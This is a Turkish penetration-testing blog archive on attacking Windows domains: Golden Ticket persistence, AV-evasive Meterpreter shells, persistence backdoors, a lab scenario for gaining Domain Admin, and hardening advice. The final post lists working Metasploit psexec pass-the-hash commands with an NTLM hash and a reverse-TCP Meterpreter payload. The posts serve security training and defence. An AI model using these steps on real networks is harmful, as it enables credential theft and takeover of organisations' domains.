[19] https://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/bellekten-parolalarin-elde-edilmesi-2.html
[20] https://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/bellekten-parolalarin-elde-edilmesi-3.html

27 Ekim 2014 Pazartesi

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Kurum içine yapılan saldırılarda veya sızma testlerinde bir Domain Admin yetkisini elde eden bir saldırgan etki alanındaki (neredeyse) her bilgisayarı ele geçirmiş olur denebilir. Eğer güven (trust) ilişki varsa diğer etki alanları da tehlike altına girebilir. Bunun yanında yönetim kolaylığı olması açısından saldırıya uğrayan etki alanına dahil olan kritik sistemler de tehlikeye girebilir. Bu sebeplerle etki alanı yönetici hesaplarının korunması kurumlar için oldukça önemlidir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/microsoft-domain-environment-penetration-tests/golden-ticket-generation-by-using-meterpreter-kiwi-extenion-and-mimikatz-tool/

http://www.siberportal.org/blue-team/securing-microsoft-domain-environment/mitigating-the-vulnerability-about-kerberos-golden-ticket/

5) Kıssada Hisse: Önlemler

Etki alanını kurum için oldukça önemlidir. Bir saldırı olması durumunda etki alanındeki kritik nesnelerin (Domain Controller makineleri, Domain Admins veya Enterprese Admins grubu üyeleri,... gibi) güven altında olması oldukça önemlidir. Etki alanını korumaya yönelik atılacak adımlar için bakınız. Ayrıca, gerçekleşen bir saldırı sonucunda kaybedilecek bazı bilgilerin (krbtgt hesabının NTLM parola özeti gibi) kurum etki alanını sürekli olarak tehlike altında bulunduracağı göz önünde bulundurulmalıdır.

Bu yazıda bahsedilen saldırıdan korunmak için gerçekleştirilebilecek işlemler için bakınız.Özetlemek gerekirse,
  • Etki alanı saldırılara karşı korunmalıdır. Saldırgan etki alanında yönetici hakkına sahip olamamalıdır. Bu amaçla gerekli sıklaştırma adımları gerçekleştirilmelidir.
  • Saldırı gerçekleşmişse, KRBTGT hasabının parolası iki kere sıfırlanmalıdır (resetlenmelidir). Ancak bu durumda manuel olarak başlatılması gereken bazı servislerin başlayamamasına, akıllı kart ile kimlik doğrulayan kullanıcıların yeni bilet talep ederek DC üzerinde yük oluşturmasına,... sebep olabilir. Hatta, bazı durumlarda kullancıların kimlik doğrulayamamasına, bilgisayarların etki alanından düşmesine de sebep olabilir.
  • Çok etkili olmasa da 4769 olay kaydı izlenebilir.

Golden Ticket kullanarak etki alanında uzun süreli yetki sahibi olunması şeklinde özetlenebilecek bu saldırı, 2014 Ocak ayında yayınlanmış olmasına rağmen daha önce kullanılmadığı anlamına gelmemektedir. Bu sebeple, özellikle 2014 yılından itibaren, etki alanına yapılan saldırıların incelenmesi ve DC'ye yetkisiz / uygunsuz erişimlerinin elde edilip edilmediğinin tespit edilmesi, bunun sonucunda da gerekli değişikliklerin yapılması kurum etki alanını korumak için önem arz etmektedir. Özellikle kritik kurumlar için, bu kontrollerin geçmişe yönelik gerçekleştirilmesi ve gerekli müdahalelerde bulunulması gerekmektedir.

Kaynak:
http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
http://rycon.hu/papers/goldenticket.html
https://www.christophertruncer.com/golden-ticket-generation/


22 Ekim 2014 Çarşamba

Post Exploitation: Meterpreter ile Klavye Hareketlerinin Elde Edilmesi

Post Exploitation: Meterpreter ile Klavye Hareketlerinin Elde Edilmesi

Bir sistem ele geçirildikten sonra kurban kullanıcının yaptığı işlemler incelenmek istenebilir. Son kullanıcının yaptığı işlemleri öğrenmenin bir yolu da klavyede bastığı tuşların dinlenmesidir. Bu yazıda, Meterpreter bağlantısı kurulan bir bilgisayardaki klavye tuşları dinlenecektir.

15 Ekim 2014 Çarşamba

MSF psexec_command Modülü & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

MSF psexec_command Modülü & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Önceki bir yazıda klasik MSF psexec modülü kullanılarak erişim bilgisi elde edilen kurban makineye meterpreter bağlantısı elde edilmişti. Ancak, bu bağlantı oluşturma sırasında kullanılan kodlar (payload) bir çok antivirüs tarafından yakalanmaktadır. Bu sebeple klasik MSF psexec modülü kullanışlılığını kaybetmiştir. "psexec_command" adlı bir başka MSF modülü ise antivirüslere yakalanmayacak şekilde hazırlanmış olan bir uygulama dosyasını kullanarak meterpreter bağlantısını sağlamaktadır.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module/

1 Eylül 2014 Pazartesi

Post Exploitation: MSF Persistence Post Modülü

Post Exploitation: MSF Persistence Post Modülü

Bir sisteme girildikten bir süre sonra bilgisayar ile bağlantı kesilebilmektedir. Bu durumda o bilgisayarı tekrar exploit etmek gerekebilir. Bunun yerine bilgisayar arka kapı da bırakılabilir. Bu yazıda, Metasploit Framework içerisindeki Persistence modülü kullanılarak arka kapı bırakılması incelenecektir.

Yazının devamı için:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-permanent-meterpreter-session-on-windows-by-using-meterpreter-persistence-script/

3 Haziran 2014 Salı

Etki Alanı Sızma Testi İçin Eğitim Amaçlı Örnek Senaryo

Etki Alanı Sızma Testi İçin Örnek Senaryo

Önceki yazıda etki alanı sızma testinin nasıl gerçekleştirildiğine dair örnek bir metodoloji sunulmuştu. Bu yazıda EĞİTİM AMAÇLI örnek bir senaryo gerçekleştirilecektir.


Ortam Bilgisi

Hazırlanan senaryoda 6 bilgisayar kullanılmaktadır:
1) XP: Standalone bir bilgisayardır. C diskinde kritik bilgi (SAM/SYSTEM dosyaları) bulunacaktır.
2) W7: Etki alanına dahil olan istemci bilgisayardır.
3) W7-Test: Etki alanına dahil edilecek olan istemci bilgisayardır. Etki alanında "Domain Admins" grubuna üye olan kullanıcının standart hesabı ile oturum açılacaktır. Üzerinde antivirüs yüklüdür. Üzerinde yüklü olan Winscp içerisinde bir de UN/PW kayıtlı bulunmaktadır. Ayrıca DC bilgisayarına RDP ile bağlantı kurulmuştur.
4) DC: Etki alanı denetleyicisidir.
5) S_Kali: Saldırı amacıyla kullanılacak KALI bilgisayardır.
6) S_W7: Saldırı amacıyla kullanılacak W7 bilgisayardır. 


Senaryo Videosu

Senaryo ile ilgili video aşağıdaki gibidir:



Videoyu indirmek için tıklayınız.

Senaryo Adımları

Senaryo 7 adımdan oluşmaktadır:
1) XP bilgisayara sızılacak ve kritik bir bilgi (C:\SAM ve C:\SYSTEM) edinilecektir.
2) 1. adımda elde edilen kritik bilgi ile etki alanına dahil olan W7 bilgisayarına erişim sağlanacaktır. Bu bilgisayardan yerel kullanıcıların parola özetleri elde edilecektir.
3) 2. adımda elde edilen yerel kullanıcıların parola özetleri ile W7-Test bilgisayarına (AV'e yakalanmadan) sızılacaktır.
4) W7-Test bilgisayarındaki mevcut kullanıcı oturumuna erişim sağlanacak. Bu bilgisayarda DC makineye yapılan RDP'ye fark edilecek. Oturum açan (Sizma\Cemil Ustun) ve Domain Admins grubundaki bir kullanıcının ("Sizma\Cemil.ustun2") parolası elde edilecek.
5) W7-Test bilgisayarına "Sizma\Cemil Ustun" adlı kullanıcı haklarıyla RDP yapılacaktır. W7-Test bilgisayarındaki AV devre dışı bırakılacaktır.
6) W7-Test bilgisayarına MSF psexec ile bağlanılacak ve Winscp ile kayıtlı bağlantı bilgileri elde edilecektir.
7) Etki alanındaki kullanıcıların parola özetleri elde edilecektir.

Senaryo Adımlarına Yönelik Resimler:


0) Ağ Keşfi ve Zafiyet Taramasi 


1) Zafiyetin Sömürülmesi: MS08-067


1-2 Geçişi) SMB Oturum Sorgulaması

2) W7 Bilgisayarına PTH ile Erişim


3) WCE ile PTH & RDP Etkinleştirme


4) Parola Çalma & Domain Admin Olma


5) AV Kapatma


6) WinSCP’de Kayıtlı Parolalarını Elde Etme


7) Domain Hesaplarının Parola Özetleri


8 Mart 2014 Cumartesi

Etki Alanı Saldırılarından Korunma Yolları: İmaj Yapılandırması

Etki Alanı Saldırılarından Korunma Yolları: İmaj Yapılandırması

Etki alanı sızma testlerinde gerçekleştirilen adımlardan birisi de yayılma adımıdır. Bir bilgisayardan yerel yöneticilerinin parolaları alındıktan sonra, aynı kullanıcı bilgilerini kullanan diğer bilgisayarlara giriş yapılmaya çalışılır. Bu amaçla aşağıdaki 2 yazı incelenebilir:
http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-smblogin-modulu-ile-yaylabilecek.html
http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-psexec-modulu-ile-yeni.html
Bu adımlardan gerçekleştirilmesinin önüne geçilmesi için etki alanındaki bir bilgisayarda bir şekilde elde edilen yerel yönetici kullanıcı parola bilgileri kullanılarak  (özet veya açık halinin) diğer bilgisayarlara erişim sağlanamamalıdır. Bu amaçla, kurum içinde kullanılan imajlar uygun şekilde oluşturulmalı ve özelleştirilerek kullanılmalıdır.
İmaj yapılandırılması için, en az aşağıdaki ayarların uygulanması gerekmektedir.
a) İmajlar güncellenmeli ve en güncel hali ile kullanılması sağlanmalıdır. Sıkılaştırma işlemleri için güvenlik şablonları kullanılabilmektedir. Güvenlik şablonları için aşağıda belirtilen kaynaklar tercih edilebilir:
http://www.bilgiguvenligi.gov.tr/kilavuz-dokumanlar/index.phphttps://benchmarks.cisecurity.org/downloads/multiform/http://web.nvd.nist.gov/view/ncp/repository
b) Etki alanına eklenen bir bilgisayar özel bir OU altına yönlendirilmesi sağlanarak (redircmp aracıyla veya hazırlanabilecek betiklerle) bu bilgisayarlar için özel grup ilkeleri kullanılmalıdır. Böylece etki alanına eklenen bir bilgisayarın otomatik olarak sıkılaştırılması da gerçekleştirilebilir. 
c) İmajlar kullanılarak işletim sistemi kurulurken, sadece gerektiği kadar kullanıcı oluşturulması saldırı yüzeyini azaltacaktır. Yerel yönetici haklarına sahip kullanıcılar oluşturulmamalı veya kontrollü bir şekilde oluşturulmalıdır. 
d) Etki alanı saldırılarından korunma için kullanılan en temel yöntemlerden biri de tuzak kullanıcı oluşturmaktır. Bu amaçla, etki alanında kullanılan yerel ilkede üç adım gerçekleştirilebilir.
  • Bilgisayardaki gömülü (built-in) yerel yönetici kullanıcısı (Administrator) devre dışı bırakılarak, adı “Test” veya “Deneme” gibi şüphe çekmeyecek şekilde güncellenir. Parolası uzun ve karmaşık verilebilir. Bu işlem grup ilkelerindeki Preferences özelliği kullanılarak aşağıdaki gibi gerçekleştirilebilir.
Gömülü Yerel Yönetici Kullanıcı Bilgilerinin Güncellenmesi
  • Gerçek yerel yönetici kullanıcısının kimliği güncellendikten sonra, yerel yönetici olarak kullanıcı adı Administrator, tanımı gömülü yerel yönetici tanımı ile aynı olan ("Built-in account for administering the computer/domain") tuzak bir kullanıcı oluşturulur. Tuzak kullanıcı parolası çok uzun ve karmaşık seçilerek parolanın açık halinin elde edilmesi zorlaştırılabilir. Ayrıca bu kullanıcı devre dışı bırakılarak, saldırganın zaman kaybetmesi sağlanabilir.Bu işlem grup ilkelerindeki Preferences özelliği kullanılarak aşağıdaki gibi gerçekleştirilebilir.
Tuzak Yerel Yönetici Kullanıcısının Oluşturulması
Not: Tuzak kullanıcı yukarıdaki gibi önleyici amaçla kullanılabildiği gibi, tespit amaçlı da kullanılabilir. Bu amaçla, tuzak kullanıcı parolası kolay elde edilebilecek şekilde kısa olarak ayarlanır. Daha sonra bu hesap ile bir kez oturum açılarak hesap etkin olarak bırakılır. Bu hesap ile yapılan işlemlerin denetim kayıtları tutularak bu hesaplar ile yapılan işlemlerden anlık olarak haberdar olunması sağlanabilir. Bu yöntem kullanılırken anlık haberleşme sisteminin etkin şekilde çalıştığından emin olunmalıdır.
  • Son adım olarak da, oluşturulan tuzak kullanıcı Users veya Guests gibi bir gruba üye yapılabilir ve bilgisayar üzerindeki tüm hakları alınır.
 
Oluşturulan Tuzak Yerel Yönetici Kullanıcısının Guests Grubuna Üye Yapılması
Not: Tuzak kullanıcı oluşturma oldukça yaygın kullanılan bir yöntemdir. Bu sebeple sızma testi sırasında deneyimli kişilerce veya saldırı anında deneyimli saldırganlarca kullanıcıların SID değerleri kontrol edilerek tespit edilebilir. Ayrıca tuzak kullanıcı oluşturulurken Preferences üzerinden parola atanması işlemi çok güvenilir bir yöntem değildir. Konu ile ilgili bir sunum için bakınız. Bu sebeple, yerel yönetici parolalarının yönetimi için özelleşmiş uygulamaların veya betiklerin kullanılması tavsiye edilmektedir. 
- Bazı özel uygulamalar ile hem parola değişiklikleri otomatik, birbirinden farklı, rastgele ve periyodik olarak sağlanabilmekte; hem de gerektiği süre boyunca bu parolaların hangi kullanıcı tarafından, hangi amaç için kullanıldığı takip edilebilmektedir. Bu uygulamaların kullanılması yerel kullanıcıların yönetimini kolaylaştıracaktır. 
- Yerel yöneticilerin parolasının verilmesi betikler kullanılarak da gerçekleştirilebilir. Bu amaçla, bilgisayar adının (hostname) özelleştirilerek kullanılması yerel yönetici parolalarının farklılaşmasını sağlamaktadır. Yerel yöneticilerin ve BIOS şifrelerinin otomatik / birbirinden farklı olarak ayarlanması ve merkezi olarak yönetilmesi konusu ile ilgili bir yazı Bilgi Güvenliği Kapısı'nda yayınlanmıştır.

7 Şubat 2014 Cuma

Etki Alanı ve Son Kullanıcıları Sızma Testi Metodolojisi

Etki Alanı ve Son Kullanıcıları Sızma Testi Metodolojisi

Microsoft domainin kullanıldığı sistemlerde yerel yönetici hesaplarına çok fazla ihtiyaç olmamakla birlikte, gerek sistem destek elemanları tarafından olsun, gerekse yerel yönetici haklarına ihtiyaç duyan yazılım geliştiriciler veya benzeri kullanıcılar tarafından olsun, bu hesaplar hâlâ kullanılabilmektir. Yerel yönetici hesapları ile çalışan bir kullanıcının hakları ile bir makineye sızıldığı takdirde, bu makinede normal kullanıcılar tarafından mümkün olmayan birçok saldırı gerçekleştirilebilmektedir. Örneğin; makinedeki şifre özetlerinin alınabilir veya o makinede oturumu halen aktif olan hesapların hakları kullanılabilir. Bu sebeple bir bilgisayarda yerel yönetici haklarının ele geçirilmesi sızma testi için oldukça önemlidir.

Kurumlarda yönetim kolaylığı için veya varsayılan ayar olarak kaldığı için birçok yerel yönetici hesabının ismi ve şifresi diğer birçok kullanıcı bilgisayarında da aynı olabilmektedir. Sonuç olarak bir makineden ele geçirilen yerel yönetici şifre özetleri, aynı şifreyi kullanan diğer bütün makineleri ele geçirmek amacıyla kullanılabilmektedir. Bu sebeple aynı parola özetlerinin kullanılması sızma testi için oldukça önemlidir.

Etki alanı ve son kullanıcıları bilgisayarları sızma testlerindeki hedef - aynı şifreyi kullanan diğer bütün bilgisayarları ele geçirmekten ziyade - domain admin kullanıcısının şifresini/biletini elde etmek ve/veya domain controller makinesine yetkili kullanıcı ile erişebilmektir. Domain yöneticisi hesapları, domaine dâhil makinelerde yüksek yetkilere sahip olmalarından dolayı kritik hesaplardır. Herhangi bir şekilde ele geçirilen bir domain yöneticisi hesabının sahip olduğu hakları kullanılarak domaine dâhil bütün sunuculara ve kullanıcı makinelerine erişilebilir. Bu erişim sonucunda bütün domain kullanıcılarının parolaları veya parola özetleri alınabileceği gibi,  ele geçirilen makinelerde; kritik bilgi içeren dosyaların incelenmesi, iletişim hattının kaydedilmesi, “key logger” çalıştırma gibi saldırılar da mümkündür. Bu saldırıların sonucunda daha kritik olan gizli bilgilere erişilebilmesi an meselesidir.

Etki alanı ve son kullanıcıları sızma testinin metodolojisi temel olarak aşağıdaki gibidir:


Etki alanı ve son kullanıcıları bilgisayarları sızma testi için akış şeması

Akış şemasının özetle şu şekildedir:

0-1-2-3) Bir makinedeki açıklıktan faydalanarak, o makinenin yerel yöneticiye ait hesap bilgileri ele geçirilir. Bu hesap bilgileri kullanıcı adı ve o kullanıcıya ait şifre ve/veya şifrenin özetidir.
4-7-8) Bu makineden domain hakkında bilgi edinilir. Bu makinedeki yerel kullanıcının hesap bilgileri ile domaindeki diğer makinelere sızılır.
5-6) Sızılan makinelerde domain yöneticisi veya domain üzerinde yetkili kullanıcıya ait şifre, şifre özeti veya bilet aranır.

Bu adımların nasıl gerçekleştirildiği hakkında ayrıntılı bilgi aşağıdaki sayfalar izlenerek edinilebilir:
0 - Makineye Fiziksel Olarak Erişerek CD/USB'den Boot Edilmesi
http://ertugrulbasaranoglu.blogspot.com.tr/2012/12/ipucu-makineye-fiziksel-olarak-eriserek.html
1 - Zafiyet Taramasının Gerçekleştirilmesi
http://ertugrulbasaranoglu.blogspot.com.tr/2012/12/ipucu-zafiyet-taramasnn.html 
2 - Zafiyetin Kullanılarak Bir Bilgisayara Sızılması
http://ertugrulbasaranoglu.blogspot.com.tr/2013/08/ipucu-zafiyetin-kullanlarak-bir.html 
3 - Yerel Yöneticilere Ait Şifre Özetlerinin Ele Geçirilmesi
http://ertugrulbasaranoglu.blogspot.com.tr/2013/09/ipucu-yerel-yoneticilere-ait-sifre.html 
4 - Hedef Makineden Sistem ve Domain Hakkında Bilgi Edinme
http://ertugrulbasaranoglu.blogspot.com.tr/2012/12/ipucu-ms08-067-zafiyetinin-kullanlmas.html
7 - smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi
http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-smblogin-modulu-ile-yaylabilecek.html
8 - psexec Modülü ile Yeni Makinelerde Oturumun Açması
http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-psexec-modulu-ile-yeni.html
5 - Yüksek Yetkili Kullanıcı Haklarının İncelenmesi
http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-yuksek-yetkili-kullanc-haklarnn.html
6 - Domainde Yetkili Kullanıcının Haklarına ve Şifresine Sahip Olma
http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-domainde-yetkili-kullancnn.html
Her bir sayfada gerçekleştirilen adımın amacı, yöntemi ve bu saldırı adımından korunulması için gerçekleştirilmesi gerekilen önlemler belirtilmiştir.Etki alanı ve son kullanıcılarına karşı gerçekleştirilen saldırılardan ve sızma testinden korunmak için alınması gerekilen önlemler için bakınız.

Etki alanı sızma testi ile ilgili örnek bir senaryo için tıklayınız.

13 Kasım 2013 Çarşamba

İpucu: smb_enumusers_domain Modülü ile Domain Admin Olma Senaryosu

smb_enumusers_domain Modülü ile Domain Admin Olma Senaryosu

Etki alanı sızma testlerinde en çok kullanılan yöntemlerden biri, aynı gömülü yerel yönetici (Built-in Administrator) parolasını kullanan bilgisayarların tespit edilmesidir. Bu amaçla öncelikle port taraması gerçekleştirilir ve tarama sonucunda 445. portu açık olan bilgisayarlarda smb_login modülü (http://www.offensive-security.com/metasploit-unleashed/SMB_Login_Check) çalıştırılır. Bu modül temel olarak hedef IP adreslerine, kimlik doğrulaması yapılacak kullanıcıya (genelde gömülü yerel yönetici kullanılır) ait etki alanı adına (genelde WORKGROUP kullanılır), kullanıcı adına (genelde Administrator kullanılır) ve parola (genelde parola direk elde edilemediği için parola özeti kullanılır) bilgilerine ihtiyaç duyar. Bu (smb_login) modül ile hedef bilgisayarlara verilen kullanıcı bilgileri ile giriş yapılabilecek bilgisayarların listesi elde edilir. Örnek bir sonuç aşağıdaki gibidir:


Bu modül ile tespit edilen bilgisayarlar için psexec modülü (http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash) çalıştırılarak hedef bilgisayarlara yetkili kullanıcı (SYSTEM) hakları ile giriş yapılmaya çalışılır. Giriş yapılan her bilgisaayrda hem kritik veri aranır hem de Domain Admin kullanıcısına ait jeton (token) araştırması yapılır.
Yukarıda temel olarak belirtilen bu işlemler sırasında Domain Admin jetonuna ulaşmak zahmetli olabilmektedir. Bu amaçla smb_enumusers_domain (http://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_enumusers_domain) adlı bir modül kullanılır. Bu modül ile bilgisayara giriş yapan kullanıcılar tespit edilebilir. Modülün örnek bir çıktısı aşağıdaki gibidir:

Bu (smb_enumusers_domain) modül, smb_login modülü ile yaklaşık olarak aynı parametreleri (hedef IP adresleri, kullanıcı adı, parola veya parola özeti, etki alanı adı başta olmak üzere diğer parametreler de özelleştirilebilir) alarak ilgili bilgisayarlarda oturumu olan hesapları listeler. Bu modülün çıktısından Domain Admin kullanıcıları seçilirse, hedef olarak bu bilgisayarlar üzerine yoğunlaşılabilir.

Bu modülün çıktısını ve etki alanındaki tüm yöneticilerin hesaplarının bulunduğu dosyayı parametre olarak alan bir betiğin sonucu aşağıdaki gibidir.


Bu modülün yaptığı işi ve daha kapsamlı seçenekler sunan KACAK adı uygulama ile ilgili ayrıntılı bilgi için bakınız.

3 Ekim 2013 Perşembe

İpucu: psexec Modülü ile Yeni Makinelerde Oturumun Açması

psexec  Modülü ile Yeni Makinelerde Oturumun Açması

Amaç
Organizasyondaki - yerel kullanıcısı ve şifresi / şifre özeti bilinen - diğer makinelerde oturum açılacaktır.

Yöntem
Bir önceki yazıda smb_login modülü ile girilebilecek bilgisayarlar tespit edilmişti. Bu adımda ise psexec modülü ile giriş denemesi yapılacaktır.
psexec modülü incelenir:
search psexec
use exploit/windows/smb/psexec
show options
psexec modülünün incelenmesi

Seçilen modül hakkında ayrıntılı bilgi elde edinilebilir:
info exploit/windows/smb/psexec
psexec modülü hakkında ayrıntılı bilginin listelenmesi

Seçenekler uygun şekilde ayarlanır:
set RHOST 192.168.172.243
set SMBPass aad3b435b51404eeaad3b435b51404ee:da8aef7a322d9ecf8d1d7e220f837176
set SMBUser administrator
set PAYLOAD windows/meterpreter/reverse_tcp
show options
psexec modülünün düzenlenmesi

Not: Domainde ilk olarak girdiğimiz bilgisayarda, "net share" komutu çalıştırıldığında “ADMIN$” paylaşımının açık olduğunu gördüğümüz için, SHARE seçeneğini aynen bırakabiliriz.

Modülü çalıştırmak için ve elde edilen bağlantıları listelemek için aşağıdaki komutlar kullanılır :
exploit
sessions -l
psexec modülü ile exploit işleminin gerçekleştirilmesi

Not: PsExec bir çok AV tarafından tespit edilebilmektedir. Bu sebeple, bağlantıda belirtildiği gibi WCE aracı kullanılarak da hedef sistemin dosya sistemine erişilebilir, bağlantıdaki gibi WCE & MS psexec aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir, bağlantıdaki gibi MSF psexec_command modülü kullanılarak Meterpreter komut satırı elde edilebilir, bağlantıdaki gibi Kali pth-winexe aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir.

Not: MSF PsExec modülü çalıştırıldığında gerçekleşebilecek hatalar için bakınız.

Önlem
  • Önceki adımlarda belirtilen önlemler alınmalıdır.